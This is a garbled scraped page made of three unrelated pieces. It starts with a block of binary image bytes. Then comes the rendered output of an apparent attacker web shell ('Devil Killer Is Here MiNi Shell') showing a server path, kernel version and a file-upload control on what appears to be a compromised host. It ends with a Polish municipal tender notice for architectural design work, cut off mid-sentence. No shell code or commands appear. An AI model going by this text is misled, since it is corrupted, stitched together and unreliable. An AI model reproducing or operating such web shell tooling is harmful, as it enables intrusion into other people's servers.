JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250623/0028880401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Rozbudowa, przebudowa oraz zmiana sposobu użytkowania budynku po byłej placówce Straży Granicznej na budynek biurowy i administracji Centrum administracyjno- społecznego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Dubeninki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790671219</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dębowa 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dubeninki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-504</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dubeninki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dubeninki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa, przebudowa oraz zmiana sposobu użytkowania budynku po byłej placówce Straży Granicznej na budynek biurowy i administracji Centrum administracyjno- społecznego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-441e8d28-8d99-469b-8468-5d5ac48e42de</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00288804</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00067865/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Rozbudowa oraz zmiana sposobu użytkowania budynku po SG na budynek biurowy i administracyjny w Dubeninkach.-projekt</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-441e8d28-8d99-469b-8468-5d5ac48e42de <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-441e8d28-8d99-469b-8468-5d5ac48e42de</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej określono w §14 i § 16 SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-441e8d28-8d99-469b-8468-5d5ac48e42de</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wypełniono w §30 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wypełniono w §30 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IGP_P.271.31.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowej dla <br/>zadania pn.: „Rozbudowa, przebudowa oraz zmiana sposobu użytkowania budynku po <br/>byłej placówce Straży Granicznej na budynek biurowy i administracji Centrum <br/>administracyjno-społecznego” oraz pełnienie nadzoru autorskiego nad przedmiotową <br/>inwestycją. <br/>2. Szczegółowy opis przedmiotu zamówienia został określony w Rozdziale II SWZ oraz we <br/>wzorze umowy, które są integralnymi załącznikami do niniejszej SWZ. <br/>3. Zgodnie z art. 91 ust. 2 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych <br/>zamawiający wskazuje, iż z uwagi na charakter zamówienia, nie dokonał jego podziału na <br/>części. <br/>Zamawiający nie dokonał podziału zamówienia na części ze względu na stwierdzenie <br/>wystąpienia następujących czynników: - podział grozi nadmiernymi trudnościami technicznymi, - podział grozi nadmiernymi kosztami wykonania zamówienia, - potrzeba skoordynowania działań różnych wykonawców realizujących poszczególne części <br/>zamówienia mogłaby poważnie zagrozić właściwemu wykonaniu zamówienia. <br/>Zamówienie obejmuje opracowanie kompletnej i spójnej dokumentacji projektowej zgodnie <br/>z obowiązującymi przepisami prawa. Podział zamówienia na części jest niemożliwy z uwagi <br/>na jego charakter oraz specyfikę. Zamawiający ma otrzymać komplet spójnych ze sobą <br/>dokumentów i opracowań, co przy podziale na części nie tylko byłoby utrudnione lecz wręcz <br/>niemożliwe. <br/>Z uwagi na powyższe oraz uwzględniając fakt, iż Zamawiający ma możliwość podjęcia <br/>autonomicznej decyzji w przedmiotowym zakresie, nie dokonano podziału zamówienia na <br/>części. <br/>3. Na podstawie art. 95 ust. 1 ustawy, Zamawiający wymaga zatrudnienia na podstawie umowy <br/>o pracę przez Wykonawcę lub/i podwykonawcę i/lub dalszego podwykonawcę wszystkich <br/>osób wykonujących czynności wymienione w ust. 4, określone w Opisie przedmiotu <br/>zamówienia. Najpóźniej w dniu rozpoczęcia usługi, Wykonawca będzie zobowiązany <br/>zatrudnić na czas realizacji zamówienia osoby wykonujące czynności, o których mowa <br/>w ust. 4, zwane dalej pracownikami, na podstawie umowy o pracę pod rygorem odstąpienia <br/>od umowy z przyczyn leżących po stronie Wykonawcy. <br/>4. Zamawiający wymaga, aby Wykonawca przedłożył oświadczenie, iż osoby skierowane do <br/>realizacji zamówienia, o których mowa w ust. 4, są zatrudnione na umowę o pracę. <br/>Oświadczenie powinno być złożone najpóźniej w terminie 7 dni od dnia podpisania umowy <br/>5 <br/>i <br/>powinno zawierać co najmniej następujące dane: imię i nazwisko zatrudnionego <br/>pracownika, datę zawarcia umowy, rodzaj zawartej umowy o pracę, okres zatrudnienia, <br/>stanowisko i zakres obowiązków pracownika, dla każdej osoby skierowanej do realizacji <br/>zamówienia. Zamawiający na każdym etapie realizacji zamówienia może żądać kopii umów <br/>o pracę i/lub innych dokumentów, o których mowa w art. 438 ust. 2 ustawy, z których <br/>jednoznacznie będzie wynikać, iż skierowane do realizacji zamówienia osoby są zatrudnione <br/>na podstawie umowy o pracę. <br/>5. Rodzaj czynności (niezbędnych do wykonania zamówienia), co do których wykonania <br/>Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub <br/>podwykonawcę osób wykonujących w trakcie realizacji zamówienia: <br/>1) prace biurowe, <br/>2) kontakt z Zamawiającym w celu realizacji przedmiotu umowy, <br/>obejmujące cały zakres rzeczowy zamówienia wskazany w SWZ oraz wzorze umowy, <br/>wykonujący prace objęte zakresem zamówienia wskazanym w SWZ, dokumentacji <br/>technicznej oraz umowie – których wykonanie zawiera cechy stosunku pracy określone w <br/>art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy <br/>6. Nieprzedłożenie przez Wykonawcę oświadczenia lub dokumentów, o których mowa <br/>powyżej w terminie wskazanym przez Zamawiającego, będzie traktowane jako <br/>niewypełnienie obowiązku zatrudnienia pracowników na podstawie umowy o pracę oraz <br/>skutkować będzie naliczeniem kar umownych w wysokości określonej w załączonym do <br/>SWZ wzorze umowy, a także zawiadomieniem Państwowej Inspekcji Pracy o podejrzeniu <br/>zastąpienia umowy o pracę z osobami wykonującymi pracę na warunkach określonych w art. <br/>22 § 1 ustawy Kodeks pracy, umową cywilnoprawną. <br/>7. Powyższe wymogi dotyczą również podwykonawców i dalszych podwykonawców <br/>wykonujących wskazane wyżej prace. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Cena ofertowa (C) – znaczenie 60 %, <br/>2) Doświadczenie projektanta w specjalności konstrukcyjno-budowlanej (D) – znaczenie: <br/>40 %, <br/>3) Ocena punktowa złożonych ofert, dla każdego z kryteriów określonych w pkt. powyżej, <br/>dokonana zostanie zgodnie z następującymi formułami: <br/>a) liczba punktów w kryterium Cena (C) zostanie obliczona na podstawie <br/>następującego wzoru: <br/>C=(Cn/Cb)x60 <br/>gdzie: <br/>C - ilość punktów uzyskanych przez ocenianą (badaną) ofertę w zakresie kryterium Cena <br/>(C), <br/>Cn - najniższa cena oferty brutto spośród wszystkich ofert podlegających ocenie, <br/>Cb - cena oferty brutto oferty ocenianej (badanej), <br/>przy czym w zakresie kryterium Cena (C), do porównania i oceny ofert brana będzie <br/>cena oferty brutto podana przez Wykonawcę w Formularzu Oferty. Im niższa cena <br/>oferty, tym większa liczba uzyskanych w tym kryterium punktów. <br/>W ramach wyżej wymienionego kryterium oferta może otrzymać maksymalnie 60 pkt. <br/>punktów zgodnie ze wzorem. <br/>b) liczba punktów w kryterium Doświadczenie projektanta w specjalności <br/>konstrukcyjno-budowlanej (D) zostanie obliczona na podstawie poniższych zasad: <br/>Zamawiający przyzna dodatkowe punkty, jeżeli Wykonawca wykaże, że osoba <br/>skierowana do realizacji zamówienia, pełniąca funkcję projektanta w specjalności <br/>konstrukcyjno-budowlanej do projektowania, posiada doświadczenie i opracowała bądź <br/>współpracowała przy opracowaniu dokumentacji projektowej dotyczącej budowy i/lub <br/>rozbudowy i/lub przebudowy obiektu użyteczności publicznej o kubaturze powyżej <br/>1000 m². <br/>Punkty zostaną przyznane według poniższego schematu: <br/>1 dokumentacja – 10 pkt, <br/>2 dokumentacje – 20 pkt, <br/>3 dokumentacje – 30 pkt, <br/>4 dokumentacje – 40 pkt. <br/>W przypadku niewskazania ilości opracowanych dokumentacji w ofercie, Zamawiający <br/>przyzna ofercie 0 pkt w tym kryterium. <br/>UWAGA <br/>19 <br/>W przypadku wskazania co najmniej jednej dokumentacji, Wykonawca <br/>zobowiązany jest załączyć do oferty dowody potwierdzające, że wskazana osoba <br/>faktycznie uczestniczyła w opracowaniu tej dokumentacji. W dokumentach musi <br/>być imiennie określona osoba pełniąca funkcję projektanta w specjalności <br/>konstrukcyjno-budowlanej oraz kubatura obiektu i jego przeznaczenie (funkcje <br/>publiczne). <br/>Dowody nie podlegają uzupełnieniu. Brak załączenia ww. dokumentów do oferty <br/>skutkować będzie przyznaniem 0 punktów w niniejszym kryterium. <br/>4) Łączna ilość punktów dla badanej oferty wynikać będzie z sumy punktów przyznanych w <br/>poszczególnych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w specjalności konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki <br/>dotyczące: <br/>1) zdolności do występowania w obrocie prawnym - Zamawiający nie określa warunków <br/>udziału w postępowaniu w niniejszym zakresie, <br/>7 <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/>wynika to z odrębnych przepisów - Zamawiający nie określa warunków udziału <br/>w postępowaniu w niniejszym zakresie, <br/>3) sytuacji ekonomicznej lub finansowej – Zamawiający nie określa warunków udziału <br/>w postępowaniu w niniejszym zakresie, <br/>4) zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeżeli: <br/>a) Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat, a jeżeli okres prowadzenia <br/>działalności jest krótszy - w tym okresie, jedną usługę polegającą na opracowaniu <br/>dokumentacji projektowej w zakresie rozbudowy i/lub przebudowy oraz zmiany <br/>sposobu użytkowania budynku użyteczności publicznej o powierzchni użytkowej <br/>najmniej 1000 m² lub opracowaniu dokumentacji projektowej w zakresie rozbudowy <br/>i/lub przebudowy oraz zmiany sposobu użytkowania budynku użyteczności publicznej, <br/>której wartość wyniosła co najmniej 100 000,00 zł brutto oraz potwierdzą, że usługi te <br/>zostały wykonane w sposób należyty. Zamawiający nie dopuszcza łączenia kilku <br/>zamówień w celu wykazania spełnienia warunku. <br/>b) Wykonawca wykaże, że dysponuje lub będzie dysponował: - co najmniej jedną osobą, która będzie pełniła funkcję projektanta - osoba posiada <br/>uprawnienia budowlane w specjalności architektonicznej bez ograniczeń do <br/>projektowania oraz przynależność do Okręgowej Izby Inżynierów Budownictwa <br/>zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane. - co najmniej jedną osobą, która będzie pełniła funkcję projektanta - osoba posiada <br/>uprawnienia w specjalności konstrukcyjno-budowlanej bez ograniczeń do <br/>projektowania oraz przynależność do Okręgowej Izby Inżynierów Budownictwa <br/>zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane. - co najmniej jedną osobą, która będzie pełniła funkcję projektanta - osoba posiada <br/>uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń <br/>cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez <br/>ograniczeń do projektowania oraz przynależność do Okręgowej Izby Inżynierów <br/>Budownictwa zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane. - co najmniej jedną osobą, która będzie pełniła funkcję projektanta - osoba posiada <br/>uprawnienia w specjalności instalacyjnej w zakresie instalacji i urządzeń: <br/>elektrycznych i elektroenergetycznych bez ograniczeń do projektowania oraz <br/>przynależność do Okręgowej Izby Inżynierów Budownictwa zgodnie z przepisami <br/>ustawy z dnia 7 lipca 1994 r. Prawo Budowlane. - co najmniej jedną osobą, która będzie pełniła funkcję projektanta - osoba posiada <br/>uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń <br/>telekomunikacyjnych do projektowania oraz przynależność do Okręgowej Izby <br/>Inżynierów Budownictwa zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo <br/>Budowlane. <br/>Zamawiający dopuszcza możliwość pełnienia kilku funkcji przez jedną osobę, o ile <br/>będzie ona posiadała wymagane uprawnienia w zakresie w/w specjalności. <br/>Uwaga: <br/>Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca <br/>1994 r. Prawo budowlane oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 <br/>8 <br/>kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania <br/>samodzielnych funkcji technicznych w budownictwie lub ważne odpowiadające im <br/>kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów upoważniające <br/>do kierowania robotami budowlanymi w zakresie objętym niniejszym zamówieniem. <br/>W przypadku Wykonawców zagranicznych, dopuszcza się również kwalifikacje, <br/>zdobyte w innych państwach, na zasadach określonych w art. 12 a ustawy Prawo <br/>budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach <br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii <br/>Europejskiej (t.j. Dz. U. z 2023 r. poz. 334). <br/>Dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania <br/>przedmiotu zamówienia) – dla osób, które posiadają uprawnienia uzyskane przed dniem <br/>wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub stwierdzenie <br/>posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji <br/>technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji <br/>w dotychczasowym zakresie. <br/>2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, <br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, <br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub <br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego <br/>łączących go z nim stosunków prawnych. <br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających <br/>zasoby, składa, wraz z wnioskiem o dopuszczenie do udziału w postępowaniu albo <br/>odpowiednio wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu <br/>do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny <br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, <br/>będzie dysponował niezbędnymi zasobami tych podmiotów. <br/>4. Zobowiązanie podmiotu udostępniającego zasoby, o których mowa w ust. 3, potwierdza, że <br/>stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje <br/>rzeczywisty dostęp do tych zasobów oraz określa w szczególności: <br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; <br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu <br/>udostępniającego te zasoby przy wykonywaniu zamówienia; <br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego <br/>wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących <br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których <br/>wskazane zdolności dotyczą. <br/>5. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby <br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają <br/>na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz bada, <br/>czy nie zachodzą, wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane <br/>względem wykonawcy. <br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/>doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających <br/>zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane. <br/>9 <br/>7. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu <br/>udostępniającego zasoby, nie potwierdza spełnienia przez Wykonawcę warunków udziału <br/>w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający <br/>żąda, aby Wykonawca w terminie określonym przez Zamawiającego: <br/>1) zastąpił ten podmiot innym podmiotem lub podmiotami albo, 